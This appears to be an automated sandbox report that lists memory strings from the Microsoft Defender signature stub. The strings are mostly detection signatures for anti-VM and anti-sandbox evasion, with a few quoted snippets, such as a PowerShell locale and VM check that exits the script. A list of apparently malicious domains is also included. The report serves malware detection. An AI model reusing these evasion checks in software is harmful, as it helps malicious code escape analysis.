Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *.vhdpmem.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp Binary or memory string: vmware-tray.exe
Source: WerFault.exe, 00000009.00000002.3010846495.0000000006164000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWPn
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp Binary or memory string: vmware
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: idKasperkyVPCVMWareSandboxieHiJackThisgetDevicesRC4
Source: MpSigStub.exe, 00000024.00000003.6293414365.00000197A317C000.00000004.00000001.sdmp Binary or memory string: ,system\currentcontrolset\services\vboxguest
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp Binary or memory string: \\vmware-host:Y
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp Binary or memory string: vmusrvc
Source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp Binary or memory string: Vmware
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: azurevirtualmachinename_scrubbed
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp Binary or memory string: VBoxTray.exe
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp Binary or memory string: IsVmWare
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp Binary or memory string: VMWARETRAY.EXE
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp Binary or memory string: vmtools
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *|%systemroot%\System32\Vmwp.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Hyper-V\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6342578169.00000197A421C000.00000004.00000001.sdmp Binary or memory string: vmtoolsx7
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp Binary or memory string: $ARRAY = [ "vmtoolsd.exe" , "vbox.exe" ]
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: azurevirtualmachinename
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *.AVHD.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *.VHD.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *.RCT.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp Binary or memory string: dynmem_detects_vmware
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.bin.|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: =8*|%systemroot%\System32\Vmcompute.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6277246842.00000197A454F000.00000004.00000001.sdmp Binary or memory string: \vmnet.exe
Source: MpSigStub.exe, 00000024.00000003.6292671700.00000197A4EEE000.00000004.00000001.sdmp Binary or memory string: RPF:DetectsVmWare
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: &!*.bin.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp Binary or memory string: ifprocessexists("vboxservice.exe")thenexit
Source: MpSigStub.exe, 00000024.00000003.6293096859.00000197A3151000.00000004.00000001.sdmp Binary or memory string: *QEMU*
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp Binary or memory string: VmWarePlayer
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: &!*.img.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: VBoxTray
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *.VHDX.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp Binary or memory string: vmtoolsd.exe
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp Binary or memory string: "Microsoft Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.img.|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000024.00000003.6311374999.00000197A384A000.00000004.00000001.sdmp Binary or memory string: RDC:\WINDOWS\SYSTEM32\VMBUSRES.DLL>C:\WINDOWS\SYSTEM32\UNKNOWNDLL.DLL
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp Binary or memory string: HARDWARE\ACPI\RSDT\VBOX__
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.xml.|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.xml.|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000024.00000003.6275006647.0000019790C75000.00000004.00000001.sdmp Binary or memory string: %s%s\%s.exe%s%sVMwareVMware
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp Binary or memory string: Ven_VMware_
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: (AntiVirtualPCAntiVirtualBoxAntiVmWare]
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp Binary or memory string: VmWareMachine
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp Binary or memory string: %qemu
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *.HRL.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp Binary or memory string: +system\currentcontrolset\services\vboxguest
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: JE%Public%\Documents\Hyper-V\Virtual Hard Disks\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.toc.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: %SystemDrive%\ProgramData\Microsoft\Windows\Hyper-V\Snapshots\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.txt.|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp Binary or memory string: .VmDetector.VirtualMachineDetector
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp Binary or memory string: ,Administrator,Guest,vmware
Source: MpSigStub.exe, 00000024.00000003.6354447244.00000197A41E2000.00000004.00000001.sdmp Binary or memory string: 2-*.log.|!\Veeam.One.Collector.VMware.Host.exe
Source: MpSigStub.exe, 00000024.00000003.6311374999.00000197A384A000.00000004.00000001.sdmp Binary or memory string: !#RANSMATTR:PeLodDynDetVmwarepea_isexe&(pea_dt_error_heur_exit_criteria|pea_dt_error_heur_API_limit|pea_dt_error_bb_limit)&pea_dynmem_detects_vmware
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.bin.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: D?%ProgramData%\Microsoft\Windows\Hyper-V\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: vmtoolsd
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp Binary or memory string: vmtools.exe
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: 83*|%systemroot%\System32\Vmwp.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp Binary or memory string: *.|!%ProgramFiles%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.img.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp Binary or memory string: HSTR:Detects_VirtualPC_VMWare
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp Binary or memory string: pea_dynmem_detects_vmware
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *.VMCX.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *.VMRS.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.xml.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp Binary or memory string: VboxService.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.txt.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp Binary or memory string: virtual hd]
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp Binary or memory string: VMware
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: &!*.txt.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: 83*|%systemroot%\System32\Vmsp.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp Binary or memory string: pUnix file descriptiontargetjob\\vmware-host:Y DomainBigSpace resultiitem]
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp Binary or memory string: virtual hd
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: % *.xml.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp Binary or memory string: f)a.VmDetector.VirtualMachineDetector
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp Binary or memory string: =mQ:#LowFiDetectsVmWareU
Source: MpSigStub.exe, 00000024.00000003.6277246842.00000197A454F000.00000004.00000001.sdmp Binary or memory string: unsubscribe vmnet notification
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp Binary or memory string: ifprocessexists("vboxtray.exe")and$
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp Binary or memory string: qemu-ga.exe
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: vmware svga ii
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp Binary or memory string: \\.\VBoxMiniRdrDN
Source: WerFault.exe, 00000009.00000003.3000293502.000000000616F000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.xml.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: Anti Sandboxie/VMware
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp Binary or memory string: ifprocessexists("vmwaretray.exe")thenexit
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: 83*|%systemroot%\System32\Vmms.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp Binary or memory string: *VMWARE*": IsVirtualPCPresent
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp Binary or memory string: myapp.exeqemu
Source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp Binary or memory string: AntiVmWare
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp Binary or memory string: "IsInVMware":
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp Binary or memory string: FA*.|!%ProgramFiles%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: % *.img.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp Binary or memory string: sandboxvmware]
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *|%systemroot%\System32\Vmcompute.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *.vmgs.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp Binary or memory string: IsVmWare]
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.rom.|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *.ISO.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *|%systemroot%\System32\Vmsp.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp Binary or memory string: *.|!%ProgramFiles(x86)%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: ZU%SystemDrive%\ProgramData\Microsoft\Windows\Hyper-V\Snapshots\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp Binary or memory string: Global\VBoxService.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.bin.|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp Binary or memory string: VMwareVMware
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: vboxmrxnp.dll
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *.VSV.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.txt.|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *|%systemroot%\System32\Vmms.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.toc.|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: VMware SVGA
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: 3.%ProgramFiles%\Hyper-V\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp Binary or memory string: %vmware
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: %Public%\Documents\Hyper-V\Virtual Hard Disks\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp Binary or memory string: if(((get-uiculture).name-match"ru|ua|by|cn")-or((get-wmiobject-classwin32_computersystem-propertymodel).model-match"virtualbox|vmware|kvm")){exit;}
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: &!*.xml.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp Binary or memory string: http://pubs.vmware.com
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: vmGuestLib.dll
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: "vmware"$bisvm=trueelseif$smodel="virtualbox"
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp Binary or memory string: SCSIDISKxxvmboxxxharddiskVMware
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp Binary or memory string: !#RANSMATTR:PeLodDetVmWarepea_isexe&(pea_dt_error_heur_exit_criteria|pea_dt_error_heur_API_limit|pea_dt_error_bb_limit)&pea_detects_vmware
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp Binary or memory string: +ifprocessexists("vmwaretray.exe")thenexit
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp Binary or memory string: ,ifprocessexists("vboxservice.exe")thenexit
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp Binary or memory string: VirtualMachineDetector
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: % *.txt.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp Binary or memory string: ".VmDetector.VirtualMachineDetector
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp Binary or memory string: Virtual HD
Source: MpSigStub.exe, 00000024.00000003.6333688289.00000197A3355000.00000004.00000001.sdmp Binary or memory string: 8mus=mud_muramuyamuebmufbmuhbmu_emuiemuqemuimmujnmuhomubrmufrmu]tmuevmucwmucymu
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp Binary or memory string: ifstringregexp($oobjectitem.name,"(?i)virtualbox|vmware|virtualpc|sandbox|333333|home-off-d5f0ac|microsof-2c393f|123|vwinxp-maltest")thenreturn1
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp Binary or memory string: 3svmcibex9
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp Binary or memory string: vmware-authd.exe
Source: MpSigStub.exe, 00000024.00000003.6354447244.00000197A41E2000.00000004.00000001.sdmp Binary or memory string: *.log.|!\Veeam.One.Collector.VMware.Host.exe
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp Binary or memory string: VMware Physical Disk Helper Service
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: &!*.toc.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.rom.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.txt.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp Binary or memory string: __tbt_isVirtualMachine
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp Binary or memory string: VBoxService.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.img.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp Binary or memory string: VMWARETRAY.EXEx
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *.BIN.|%SYSTEMPROCESS%|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.bin.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.rom.|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.rom.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6311374999.00000197A384A000.00000004.00000001.sdmp Binary or memory string: w!#RANSMATTR:PeLodDynDetVmwarepea_isexe&(pea_dt_error_heur_exit_criteria|pea_dt_error_heur_API_limit|pea_dt_error_bb_limit)&pea_dynmem_detects_vmware
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp Binary or memory string: qemuvirtualvmware\\.\PhysicalDrive0
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: VMWare
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: =8*.BIN.|%systemroot%\System32\Vmwp.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.toc.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp Binary or memory string: p!#RANSMATTR:PeLodDetVmWarepea_isexe&(pea_dt_error_heur_exit_criteria|pea_dt_error_heur_API_limit|pea_dt_error_bb_limit)&pea_detects_vmware
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp Binary or memory string: vmwareservice.exe
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: >Host: virtualmachine-update.com
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp Binary or memory string: "SOFTWARE\VMware, Inc.\VMware Tools
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp Binary or memory string: KF*.|!%ProgramFiles(x86)%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *.vhds.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.img.|!\qemu-system-armel.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe Process information queried: ProcessInformation

HIPS / PFW / Operating System Protection Evasion:

Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\3A24BB4C-F6EB-A1AC-C6CC-E780FED56A57.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
Contains functionality to query the security center for anti-virus and firewall products
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: array("winmgmts:","win32_logicaldisk","win32_operatingsystem","winmgmts:\\localhost\root\securitycenter","antivirusproduct")
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p(backup1services.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p2backupmaster-service.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p0backupmasterservice.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p(service1updater.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: driverdwl.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p$backup1master.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p,boost-yourservice.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p&checktodrivers.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p$backup1helper.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p&driver1updater.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p$driver1master.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p view-backup.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p.top3servicebooster.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p$servicereader.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: servicehel.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p(driver-boosters.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p&service1update.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p service-hel.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p*driver1downloads.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p"service1view.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p&backups1helper.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: idriveview.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p$debug-service.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: idrivedwn.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p"driverjumper.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p$service1boost.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p"idriveupdate.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p"idrivehepler.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: p"idrivefinder.com
